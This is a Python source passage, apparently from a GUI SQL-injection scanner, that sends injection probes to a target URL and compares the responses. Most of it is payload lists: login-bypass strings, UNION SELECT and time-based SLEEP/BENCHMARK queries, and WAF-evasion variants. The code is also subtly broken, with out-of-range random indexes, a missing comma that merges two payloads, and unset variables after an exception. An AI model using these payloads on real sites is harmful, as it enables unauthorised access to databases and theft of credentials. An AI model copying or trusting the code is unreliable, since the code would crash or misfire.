def Integer_sqlinj_scan(self):
try:
res_md5_1 = md5_encrypt(
requests.get(url=self.url, headers=HEADER).text)
res_md5_2 = md5_encrypt(
requests.get(url=self.url + urlencode('+1'),
headers=HEADER).text)
res_md5_3 = md5_encrypt(
requests.get(url=self.url + urlencode('+1-1'),
headers=HEADER).text)
res_DOM_1 = DOM.check(self.url)
res_DOM_2 = DOM.check(self.url + urlencode('+1'))
res_DOM_3 = DOM.check(self.url + urlencode('+1-1'))
except Exception as e:
print(e)
res_md5_1 = res_md5_2 = res_md5_3 = 0
pass
if (res_DOM_1 == res_DOM_3 and res_DOM_1 != res_DOM_2) or (
(res_md5_1 == res_md5_3) and res_md5_1 != res_md5_2):
return self.url
return 0
def Str_sqlinj_scan(self, waf):
quotes = ['\'', '"', '']
payload_0 = [
" and 0;-- ",
"/**/and/**/0;#",
"\tand\t0;#",
"\nand/**/0;#",
"\'-\'",
"\' \'",
"\'&\'",
"\'^\'",
"\'*\'",
"\' or \'\'-\'",
"\' or \'\' \'",
"\' or \'\'&\'",
"\' or \'\'^\'",
"\' or \'\'*\'",
"\"-\"",
"\" \"",
"\"&\"",
"\"^\"",
"\"*\"",
"\" or \"\"-\"",
"\" or \"\" \"",
"\" or \"\"&\"",
"\" or \"\"^\"",
"\" or \"\"*\"",
"or true--",
"\" or true--",
"\' or true--",
"\") or true--",
"\') or true--",
"\' or \'x\'=\'x",
"\') or (\'x\')=(\'x",
"\')) or ((\'x\'))=((\'x",
"\" or \"x\"=\"x",
"\") or (\"x\")=(\"x",
"\")) or ((\"x\"))=((\"x",
"or 1=1",
"or 1=1--",
"or 1=1#",
"or 1=1/*",
"admin\' --",
"admin\' #",
"admin\'/*",
"admin\' or \'1\'=\'1",
"admin\' or \'1\'=\'1\'--",
"admin\' or \'1\'=\'1\'#",
"admin\' or \'1\'=\'1\'/*",
"admin\'or 1=1 or \'\'=\'",
"admin\' or 1=1",
"admin\' or 1=1--",
"admin\' or 1=1#",
"admin\' or 1=1/*",
"admin\') or (\'1\'=\'1",
"admin\') or (\'1\'=\'1\'--",
"admin\') or (\'1\'=\'1\'#",
"admin\') or (\'1\'=\'1\'/*",
"admin\') or \'1\'=\'1",
"admin\') or \'1\'=\'1\'--",
"admin\') or \'1\'=\'1\'#",
"admin\') or \'1\'=\'1\'/*",
"1234 \' AND 1=0 UNION ALL SELECT \'admin\', \'81dc9bdb52d04dc20036dbd8313ed055",
"admin\" --",
"admin\" #",
"admin\"/*",
"admin\" or \"1\"=\"1",
"admin\" or \"1\"=\"1\"--",
"admin\" or \"1\"=\"1\"#",
"admin\" or \"1\"=\"1\"/*",
"admin\"or 1=1 or \"\"=\"",
"admin\" or 1=1",
"admin\" or 1=1--",
"admin\" or 1=1#",
"admin\" or 1=1/*",
"admin\") or (\"1\"=\"1",
"admin\") or (\"1\"=\"1\"--",
"admin\") or (\"1\"=\"1\"#",
"admin\") or (\"1\"=\"1\"/*",
"admin\") or \"1\"=\"1",
"admin\") or \"1\"=\"1\"--",
"admin\") or \"1\"=\"1\"#",
"admin\") or \"1\"=\"1\"/*",
"1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed05\"",
" UNION ALL SELECT 1,2,3,4",
" UNION ALL SELECT 1,2,3,4,5-- ",
" UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5",
" UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ",
" AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ",
" UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--",
" RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
]
payload_1 = [
" and 1;-- ",
"/**/and/**/1;#",
"\tand\t1;#",
"\nand/**/1;#",
"\'-\'",
"\' \'",
"\'&\'",
"\'^\'",
"\'*\'",
"\' or \'\'-\'",
"\' or \'\' \'",
"\' or \'\'&\'",
"\' or \'\'^\'",
"\' or \'\'*\'",
"\"-\"",
"\" \"",
"\"&\"",
"\"^\"",
"\"*\"",
"\" or \"\"-\"",
"\" or \"\" \"",
"\" or \"\"&\"",
"\" or \"\"^\"",
"\" or \"\"*\"",
"or true--",
"\" or true--",
"\' or true--",
"\") or true--",
"\') or true--",
"\' or \'x\'=\'x",
"\') or (\'x\')=(\'x",
"\')) or ((\'x\'))=((\'x",
"\" or \"x\"=\"x",
"\") or (\"x\")=(\"x",
"\")) or ((\"x\"))=((\"x",
"or 1=1",
"or 1=1--",
"or 1=1#",
"or 1=1/*",
"admin\' --",
"admin\' #",
"admin\'/*",
"admin\' or \'1\'=\'1",
"admin\' or \'1\'=\'1\'--",
"admin\' or \'1\'=\'1\'#",
"admin\' or \'1\'=\'1\'/*",
"admin\'or 1=1 or \'\'=\'",
"admin\' or 1=1",
"admin\' or 1=1--",
"admin\' or 1=1#",
"admin\' or 1=1/*",
"admin\') or (\'1\'=\'1",
"admin\') or (\'1\'=\'1\'--",
"admin\') or (\'1\'=\'1\'#",
"admin\') or (\'1\'=\'1\'/*",
"admin\') or \'1\'=\'1",
"admin\') or \'1\'=\'1\'--",
"admin\') or \'1\'=\'1\'#",
"admin\') or \'1\'=\'1\'/*",
"1234 \' AND 1=0 UNION ALL SELECT \'admin\', \'81dc9bdb52d04dc20036dbd8313ed055",
"admin\" --",
"admin\" #",
"admin\"/*",
"admin\" or \"1\"=\"1",
"admin\" or \"1\"=\"1\"--",
"admin\" or \"1\"=\"1\"#",
"admin\" or \"1\"=\"1\"/*",
"admin\"or 1=1 or \"\"=\"",
"admin\" or 1=1",
"admin\" or 1=1--",
"admin\" or 1=1#",
"admin\" or 1=1/*",
"admin\") or (\"1\"=\"1",
"admin\") or (\"1\"=\"1\"--",
"admin\") or (\"1\"=\"1\"#",
"admin\") or (\"1\"=\"1\"/*",
"admin\") or \"1\"=\"1",
"admin\") or \"1\"=\"1\"--",
"admin\") or \"1\"=\"1\"#",
"admin\") or \"1\"=\"1\"/*",
"1234 \" AND 1=0 UNION ALL SELECT \""
" UNION ALL SELECT 1,2,3,4",
" UNION ALL SELECT 1,2,3,4,5-- ",
" UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5",
" UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ",
" AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ",
" UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--",
" RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
]
payload_3 = [
" And 0;-- ",
"/**/And/**/0;#",
"\tAnd\t0;#",
"\nAnd/**/0;#",
" Union All Select 1,2,3,4",
" Union All Select 1,2,3,4,5-- ",
" Union All Select @@version,sleep(5),user(),benchmark(1000000,md5('A')),5",
" Union All Select @@version,user(),sleep(5),benchmark(1000000,md5('A')),null,null,null-- ",
" And 5650=CONVERT(int,(Union all selectchar(88)+char(88)+char(88)))-- ",
" Union All Select 'inj'||'ect'||'xxx',2,3,4,5--",
" Rlike (Select (case when (4346=4346) then 0x61646d696e else 0x28 end)) and 'Txws'='",
" And%200;--",
" Union%20All%20Select%201,2,3,4",
" Union%20All%20Select%201,2,3,4,5--",
" Union%20All%20Select%20@@version,sleep(5),user(),benchmark(1000000,md5(%27A%27)),5",
" Union%20All%20Select%20@@version,user(),sleep(5),benchmark(1000000,md5(%27A%27)),null,null,null--",
" And%205650=CONVERT(int,(Union%20all%20selectchar(88)+char(88)+char(88)))--",
" Union%20All%20Select%20%27inj%27||%27ect%27||%27xxx%27,2,3,4,5--",
" Rlike%20(Select%20(case%20when%20(4346=4346)%20then%200x61646d696e%20else%200x28%20end))%20and%20%27Txws%27=%27",
" chr(97)+chr(110)+chr(100) 0;-- ",
" aandNandd 0;-- ",
]
payload_4 = [
" And 0;-- ",
"/**/And/**/0;#",
"\tAnd\t0;#",
"\nAnd/**/0;#",
" Union All Select 1,2,3,4",
" Union All Select 1,2,3,4,5-- ",
" Union All Select @@version,sleep(5),user(),benchmark(1000000,md5('A')),5",
" Union All Select @@version,user(),sleep(5),benchmark(1000000,md5('A')),null,null,null-- ",
" And 5650=CONVERT(int,(Union all selectchar(88)+char(88)+char(88)))-- ",
" Union All Select 'inj'||'ect'||'xxx',2,3,4,5--",
" Rlike (Select (case when (4346=4346) then 0x61646d696e else 0x28 end)) and 'Txws'='",
" And%200;--",
" Union%20All%20Select%201,2,3,4",
" Union%20All%20Select%201,2,3,4,5--",
" Union%20All%20Select%20@@version,sleep(5),user(),benchmark(1000000,md5(%27A%27)),5",
" Union%20All%20Select%20@@version,user(),sleep(5),benchmark(1000000,md5(%27A%27)),null,null,null--",
" And%205650=CONVERT(int,(Union%20all%20selectchar(88)+char(88)+char(88)))--",
" Union%20All%20Select%20%27inj%27||%27ect%27||%27xxx%27,2,3,4,5--",
" Rlike%20(Select%20(case%20when%20(4346=4346)%20then%200x61646d696e%20else%200x28%20end))%20and%20%27Txws%27=%27",
" chr(97)+chr(110)+chr(100) 0;-- ",
" aandNandd 0;-- ",
]
for i in quotes:
for j in range(10):
if waf.cget("text") == 'WAF:None':
p0 = i + payload_0[random.randint(0, 85)]
p1 = i + payload_1[random.randint(0, 85)]
else:
p0 = i + payload_3[random.randint(0, 85)]
p1 = i + payload_4[random.randint(0, 85)]
try:
res_md5_1 = md5_encrypt(
requests.get(url=self.url, headers=HEADER).text)
res_md5_2 = md5_encrypt(
requests.get(url=self.url + urlencode(p0),
headers=HEADER).text)
res_md5_3 = md5_encrypt(
requests.get(url=self.url + urlencode(p1),
headers=HEADER).text)
res_DOM_1 = DOM.check(self.url)
res_DOM_2 = DOM.check(self.url + urlencode(p0))
res_DOM_3 = DOM.check(self.url + urlencode(p1))
except Exception as e:
print(e)
res_md5_1 = res_md5_2 = res_md5_3 = 0
pass
if (res_DOM_1 == res_DOM_3 and res_DOM_1 != res_DOM_2) or (
(res_md5_1 == res_md5_3) and res_md5_1 != res_md5_2):
return p0 + "~" + self.url
return 0
